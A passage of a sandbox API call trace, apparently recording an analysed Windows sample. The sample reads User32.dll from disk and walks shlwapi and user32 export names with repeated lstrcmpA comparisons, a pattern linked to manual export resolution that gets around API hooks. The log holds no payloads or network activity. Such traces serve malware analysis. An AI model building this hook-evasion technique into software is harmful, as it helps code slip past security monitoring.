lpString2="AssocQueryStringByKeyW") returned 1 [0190.994] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0190.994] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0190.994] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0190.994] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0190.994] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0190.994] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0190.994] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0190.994] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0190.994] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0190.994] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0190.994] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0190.994] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0190.994] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0190.994] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0190.995] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0190.995] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0190.995] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0190.995] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0190.995] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0190.995] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0190.995] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0190.995] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0190.995] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0190.995] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0190.995] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0190.995] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0190.995] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0190.995] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0190.995] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0190.996] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0190.996] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0190.996] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0190.996] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0190.996] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0190.996] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0190.996] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0190.996] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0190.996] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0190.996] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0190.996] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0190.996] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0190.996] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0190.996] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0190.996] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0190.996] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0190.996] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0190.996] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0190.996] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0190.996] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0190.996] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0190.996] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0190.996] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0190.996] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0190.996] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0190.996] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0190.996] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0190.997] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0190.997] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0190.997] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0190.997] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0190.997] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0190.997] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0190.997] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0190.997] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0190.997] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0190.997] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0190.997] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0190.997] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0190.998] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0190.998] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0190.998] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0190.998] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0190.998] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0190.998] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0190.998] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0190.998] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0190.998] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0190.998] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0190.998] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0190.998] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0190.998] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0190.998] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0190.998] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0190.998] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0190.998] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0190.998] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0190.998] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0190.998] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0190.999] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0190.999] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0190.999] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0190.999] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0190.999] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0190.999] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0190.999] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0191.000] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0191.001] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0191.001] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0191.001] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0191.001] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0191.001] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0191.001] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0191.001] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0191.001] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0191.001] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0191.001] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0191.001] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0191.001] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0191.001] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0191.001] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0191.001] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0191.001] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0191.001] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0191.001] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0191.001] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0191.001] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0191.001] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0191.001] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0191.001] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0191.001] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0191.001] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0191.001] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0191.002] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0191.002] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0191.002] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0191.002] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0191.002] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0191.149] GetProcessHeap () returned 0x590000 [0191.149] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d05030 | out: hHeap=0x590000) returned 1 [0191.149] GetProcessHeap () returned 0x590000 [0191.149] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a93a0 [0191.149] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0191.150] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0191.150] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0191.150] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0191.150] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0191.151] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0191.151] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0191.151] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0191.151] GetProcessHeap () returned 0x590000 [0191.151] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1555b8) returned 0x40c8040 [0191.155] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0191.155] ReadFile (in: hFile=0x17c, lpBuffer=0x40c8040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40c8040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0191.437] CloseHandle (hObject=0x17c) returned 1 [0191.438] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0191.438] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0191.438] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0191.438] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0191.438] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0191.438] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0191.438] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0191.438] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0191.438] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0191.438] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0191.438] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0191.439] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0191.439] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0191.439] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0191.439] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0191.439] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0191.439] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0191.439] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0191.439] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0191.439] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0191.439] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0191.439] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0191.439] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0191.439] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0191.439] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0191.439] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0191.439] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0191.439] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0191.439] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0191.439] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0191.439] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0191.440] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0191.440] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0191.440] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0191.440] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0191.440] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0191.440] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0191.440] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0191.440] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0191.440] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0191.440] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0191.440] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0191.440] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0191.440] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0191.440] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0191.440] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0191.440] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0191.440] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0191.440] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0191.440] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0191.440] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0191.440] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0191.440] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0191.441] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0191.441] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0191.441] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0191.441] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0191.441] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0191.441] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0191.441] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0191.441] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0191.441] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0191.441] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0191.441] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0191.441] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0191.441] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0191.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0191.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0191.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0191.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0191.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0191.442] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0191.442] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0191.442] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0191.442] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0191.442] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0191.442] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0191.442] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0191.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0191.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0191.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0191.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0191.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0191.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0191.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0191.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0191.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0191.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0191.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0191.443] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 